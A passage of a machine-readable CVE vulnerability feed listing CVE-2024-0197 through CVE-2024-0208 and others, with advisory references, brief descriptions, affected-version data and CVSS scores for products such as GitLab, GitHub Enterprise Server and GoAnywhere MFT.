"https://github.com/laoquanshi/puppy/blob/main/Magic-Api%20Code%20Execution%20Vulnerability.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249511", "name" : "https://vuldb.com/?ctiid.249511", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249511", "name" : "https://vuldb.com/?ctiid.249511", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249511", "name" : "https://vuldb.com/?id.249511", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249511", "name" : "https://vuldb.com/?id.249511", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability has been found in Magic-Api up to 2.0.1 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /resource/file/api/save?auto=1. The manipulation leads to code injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249511." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:ssssssss:magic-api:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2.0.1", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-02T22:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0197", "ASSIGNER" : "psirt@thalesgroup.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://supportportal.thalesgroup.com", "name" : "https://supportportal.thalesgroup.com", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://supportportal.thalesgroup.com", "name" : "https://supportportal.thalesgroup.com", "refsource" : "", "tags" : [ "Product" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A flaw in the installer for Thales SafeNet Sentinel HASP LDK prior to 9.16 on Windows allows an attacker to escalate their privilege level via local access.\n\n" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:thalesgroup:sentinel_hasp_ldk:*:*:*:*:*:*:*:*", "versionEndExcluding" : "9.16", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-02-27T13:15Z", "lastModifiedDate" : "2025-03-04T14:29Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0198", "ASSIGNER" : "cve@gitlab.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-02-11T02:15Z", "lastModifiedDate" : "2025-02-11T02:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0199", "ASSIGNER" : "cve@gitlab.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-863" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://about.gitlab.com/releases/2024/03/06/security-release-gitlab-16-9-2-released/", "name" : "https://about.gitlab.com/releases/2024/03/06/security-release-gitlab-16-9-2-released/", "refsource" : "", "tags" : [ "Release Notes" ] }, { "url" : "https://about.gitlab.com/releases/2024/03/06/security-release-gitlab-16-9-2-released/", "name" : "https://about.gitlab.com/releases/2024/03/06/security-release-gitlab-16-9-2-released/", "refsource" : "", "tags" : [ "Release Notes" ] }, { "url" : "https://gitlab.com/gitlab-org/gitlab/-/issues/436977", "name" : "GitLab Issue #436977", "refsource" : "", "tags" : [ "Exploit", "Issue Tracking" ] }, { "url" : "https://gitlab.com/gitlab-org/gitlab/-/issues/436977", "name" : "GitLab Issue #436977", "refsource" : "", "tags" : [ "Exploit", "Issue Tracking" ] }, { "url" : "https://hackerone.com/reports/2295423", "name" : "HackerOne Bug Bounty Report #2295423", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://hackerone.com/reports/2295423", "name" : "HackerOne Bug Bounty Report #2295423", "refsource" : "", "tags" : [ "Permissions Required" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "An authorization bypass vulnerability was discovered in GitLab affecting versions 11.3 prior to 16.7.7, 16.7.6 prior to 16.8.4, and 16.8.3 prior to 16.9.2. An attacker could bypass CODEOWNERS by utilizing a crafted payload in an old feature branch to perform malicious actions." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding" : "16.9.0", "versionEndExcluding" : "16.9.2", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding" : "16.9.0", "versionEndExcluding" : "16.9.2", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding" : "16.8.0", "versionEndExcluding" : "16.8.4", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding" : "16.8.0", "versionEndExcluding" : "16.8.4", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding" : "11.3", "versionEndExcluding" : "16.7.7", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding" : "11.3", "versionEndExcluding" : "16.7.7", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.0, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.1, "impactScore" : 5.9 } }, "publishedDate" : "2024-03-07T01:15Z", "lastModifiedDate" : "2024-12-11T20:12Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0200", "ASSIGNER" : "product-cna@github.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-470" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.5", "name" : "https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.5", "refsource" : "", "tags" : [ "Release Notes" ] }, { "url" : "https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.5", "name" : "https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.5", "refsource" : "", "tags" : [ "Release Notes" ] }, { "url" : "https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.3", "name" : "https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.3", "refsource" : "", "tags" : [ "Release Notes" ] }, { "url" : "https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.3", "name" : "https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.3", "refsource" : "", "tags" : [ "Release Notes" ] }, { "url" : "https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.13", "name" : "https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.13", "refsource" : "", "tags" : [ "Release Notes" ] }, { "url" : "https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.13", "name" : "https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.13", "refsource" : "", "tags" : [ "Release Notes" ] }, { "url" : "https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.8", "name" : "https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.8", "refsource" : "", "tags" : [ "Release Notes" ] }, { "url" : "https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.8", "name" : "https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.8", "refsource" : "", "tags" : [ "Release Notes" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "An unsafe reflection vulnerability was identified in GitHub Enterprise Server that could lead to reflection injection. This vulnerability could lead to the execution of user-controlled methods and remote code execution. To exploit this bug, an actor would need to be logged into an account on the GHES instance with the organization owner role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.8.13, 3.9.8, 3.10.5, and 3.11.3. This vulnerability was reported via the GitHub Bug Bounty program.\n\n" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:*", "versionStartIncluding" : "3.11.0", "versionEndExcluding" : "3.11.3", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:*", "versionStartIncluding" : "3.10.0", "versionEndExcluding" : "3.10.5", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:*", "versionStartIncluding" : "3.9.0", "versionEndExcluding" : "3.9.8", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:*", "versionStartIncluding" : "3.8.0", "versionEndExcluding" : "3.8.13", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-16T19:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0201", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-862" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/product-expiry-for-woocommerce/tags/2.5/product-expiry-for-woocommerce.php#L263", "name" : "https://plugins.trac.wordpress.org/browser/product-expiry-for-woocommerce/tags/2.5/product-expiry-for-woocommerce.php#L263", "refsource" : "", "tags" : [ "Issue Tracking" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/product-expiry-for-woocommerce/tags/2.5/product-expiry-for-woocommerce.php#L263", "name" : "https://plugins.trac.wordpress.org/browser/product-expiry-for-woocommerce/tags/2.5/product-expiry-for-woocommerce.php#L263", "refsource" : "", "tags" : [ "Issue Tracking" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/product-expiry-for-woocommerce/tags/2.6/product-expiry-for-woocommerce.php?rev=3014924#L263", "name" : "https://plugins.trac.wordpress.org/browser/product-expiry-for-woocommerce/tags/2.6/product-expiry-for-woocommerce.php?rev=3014924#L263", "refsource" : "", "tags" : [ "Issue Tracking" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/product-expiry-for-woocommerce/tags/2.6/product-expiry-for-woocommerce.php?rev=3014924#L263", "name" : "https://plugins.trac.wordpress.org/browser/product-expiry-for-woocommerce/tags/2.6/product-expiry-for-woocommerce.php?rev=3014924#L263", "refsource" : "", "tags" : [ "Issue Tracking" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/c4006612-770a-482f-a8c2-e62f607914a9?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/c4006612-770a-482f-a8c2-e62f607914a9?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/c4006612-770a-482f-a8c2-e62f607914a9?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/c4006612-770a-482f-a8c2-e62f607914a9?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Product Expiry for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'save_settings' function in versions up to, and including, 2.5. This makes it possible for authenticated attackers, with subscriber-level permissions or above to update plugin settings." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:webcodingplace:product_expiry_for_woocommerce:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "2.6", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-01-03T10:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0202", "ASSIGNER" : "patrick@puiterwijk.org" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-203" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2256518", "name" : "RHBZ#2256518", "refsource" : "", "tags" : [ "Issue Tracking", "Third Party Advisory" ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2256518", "name" : "RHBZ#2256518", "refsource" : "", "tags" : [ "Issue Tracking", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A security vulnerability has been identified in the cryptlib cryptographic library when cryptlib is compiled with the support for RSA key exchange ciphersuites in TLS (by setting the USE_RSA_SUITES define), it will be vulnerable to the timing variant of the Bleichenbacher attack. An attacker that is able to perform a large number of connections to the server will be able to decrypt RSA ciphertexts or forge signatures using server's certificate." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:cryptlib:cryptlib:*:*:*:*:*:*:*:*", "versionEndExcluding" : "3.4.7", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "HIGH", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 5.9, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.2, "impactScore" : 3.6 } }, "publishedDate" : "2024-02-05T21:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0203", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-352" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://digits.unitedover.com/changelog/", "name" : "https://digits.unitedover.com/changelog/", "refsource" : "", "tags" : [ "Release Notes" ] }, { "url" : "https://digits.unitedover.com/changelog/", "name" : "https://digits.unitedover.com/changelog/", "refsource" : "", "tags" : [ "Release Notes" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/84f2afb4-f1c6-4313-8958-38f1b5140a67?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/84f2afb4-f1c6-4313-8958-38f1b5140a67?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/84f2afb4-f1c6-4313-8958-38f1b5140a67?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/84f2afb4-f1c6-4313-8958-38f1b5140a67?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Digits plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 8.4.1. This is due to missing nonce validation in the 'digits_save_settings' function. This makes it possible for unauthenticated attackers to modify the default role of registered users to elevate user privileges via a forged request granted they can trick a site administrator into performing an action such as clicking on a link." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:unitedover:digits:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "8.4.2", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-03-07T20:15Z", "lastModifiedDate" : "2025-01-21T18:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0204", "ASSIGNER" : "security.reports@fortra.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-425" } ] } ] }, "references" : { "reference_data" : [ { "url" : "http://packetstormsecurity.com/files/176683/GoAnywhere-MFT-Authentication-Bypass.html", "name" : "http://packetstormsecurity.com/files/176683/GoAnywhere-MFT-Authentication-Bypass.html", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "http://packetstormsecurity.com/files/176683/GoAnywhere-MFT-Authentication-Bypass.html", "name" : "http://packetstormsecurity.com/files/176683/GoAnywhere-MFT-Authentication-Bypass.html", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "http://packetstormsecurity.com/files/176974/Fortra-GoAnywhere-MFT-Unauthenticated-Remote-Code-Execution.html", "name" : "http://packetstormsecurity.com/files/176974/Fortra-GoAnywhere-MFT-Unauthenticated-Remote-Code-Execution.html", "refsource" : "", "tags" : [ ] }, { "url" : "http://packetstormsecurity.com/files/176974/Fortra-GoAnywhere-MFT-Unauthenticated-Remote-Code-Execution.html", "name" : "http://packetstormsecurity.com/files/176974/Fortra-GoAnywhere-MFT-Unauthenticated-Remote-Code-Execution.html", "refsource" : "", "tags" : [ ] }, { "url" : "https://my.goanywhere.com/webclient/ViewSecurityAdvisories.xhtml", "name" : "https://my.goanywhere.com/webclient/ViewSecurityAdvisories.xhtml", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://my.goanywhere.com/webclient/ViewSecurityAdvisories.xhtml", "name" : "https://my.goanywhere.com/webclient/ViewSecurityAdvisories.xhtml", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://www.fortra.com/security/advisory/fi-2024-001", "name" : "https://www.fortra.com/security/advisory/fi-2024-001", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.fortra.com/security/advisory/fi-2024-001", "name" : "https://www.fortra.com/security/advisory/fi-2024-001", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Authentication bypass in Fortra's GoAnywhere MFT prior to 7.4.1 allows an unauthorized user to create an admin user via the administration portal." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:fortra:goanywhere_managed_file_transfer:6.0.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:fortra:goanywhere_managed_file_transfer:*:*:*:*:*:*:*:*", "versionStartIncluding" : "7.0.0", "versionEndExcluding" : "7.4.1", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-22T18:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0206", "ASSIGNER" : "trellixpsirt@trellix.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-59" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://kcm.trellix.com/corporate/index?page=content&id=SB10415", "name" : "https://kcm.trellix.com/corporate/index?page=content&id=SB10415", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://kcm.trellix.com/corporate/index?page=content&id=SB10415", "name" : "https://kcm.trellix.com/corporate/index?page=content&id=SB10415", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "\nA symbolic link manipulation vulnerability in Trellix Anti-Malware Engine prior to the January 2024 release allows an authenticated local user to potentially gain an escalation of privileges. This was achieved by adding an entry to the registry under the Trellix ENS registry folder with a symbolic link to files that the user wouldn't normally have permission to. After a scan, the Engine would follow the links and remove the files\n\n" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:trellix:anti-malware_engine:6600:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-09T14:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0207", "ASSIGNER" : "cve@gitlab.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-125" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://gitlab.com/wireshark/wireshark/-/issues/19502", "name" : "GitLab Issue #19502", "refsource" : "", "tags" : [ "Exploit", "Issue Tracking", "Vendor Advisory" ] }, { "url" : "https://gitlab.com/wireshark/wireshark/-/issues/19502", "name" : "GitLab Issue #19502", "refsource" : "", "tags" : [ "Exploit", "Issue Tracking", "Vendor Advisory" ] }, { "url" : "https://www.wireshark.org/security/wnpa-sec-2024-03.html", "name" : "https://www.wireshark.org/security/wnpa-sec-2024-03.html", "refsource" : "", "tags" : [ "Exploit", "Vendor Advisory" ] }, { "url" : "https://www.wireshark.org/security/wnpa-sec-2024-03.html", "name" : "https://www.wireshark.org/security/wnpa-sec-2024-03.html", "refsource" : "", "tags" : [ "Exploit", "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "HTTP3 dissector crash in Wireshark 4.2.0 allows denial of service via packet injection or crafted capture file" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:wireshark:wireshark:4.2.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-03T08:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0208", "ASSIGNER" : "cve@gitlab.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-Other" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://gitlab.com/wireshark/wireshark/-/issues/19496", "name" : "GitLab Issue #19496", "refsource" : "", "tags" : [ "Exploit", "Issue Tracking", "Vendor Advisory" ] }, { "url" : "https://gitlab.com/wireshark/wireshark/-/issues/19496", "name" : "GitLab Issue #19496", "refsource" : "", "tags" : [ "Exploit", "Issue Tracking", "Vendor Advisory" ] }, { "url" : "https://lists.debian.org/debian-lts-announce/2024/02/msg00016.html", "name" : "https://lists.debian.org/debian-lts-announce/2024/02/msg00016.html", "refsource" : "", "tags" : [ ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/34DBP5P2RHQ7XUABPANYYMOGV5KS6VEP/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/34DBP5P2RHQ7XUABPANYYMOGV5KS6VEP/", "refsource" : "", "tags" : [ ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MADSCHKZSCKQ5NLIX3UMOIJD2JZ65L4V/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MADSCHKZSCKQ5NLIX3UMOIJD2JZ65L4V/", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.wireshark.org/security/wnpa-sec-2024-01.html", "name" : "https://www.wireshark.org/security/wnpa-sec-2024-01.html", "refsource" : "", "tags" : [ "Issue Tracking", "Vendor Advisory" ] }, { "url" : "https://www.wireshark.org/security/wnpa-sec-2024-01.html", "name" : "https://www.wireshark.org/security/wnpa-sec-2024-01.html", "refsource" : "", "tags" : [ "Issue Tracking", "Vendor 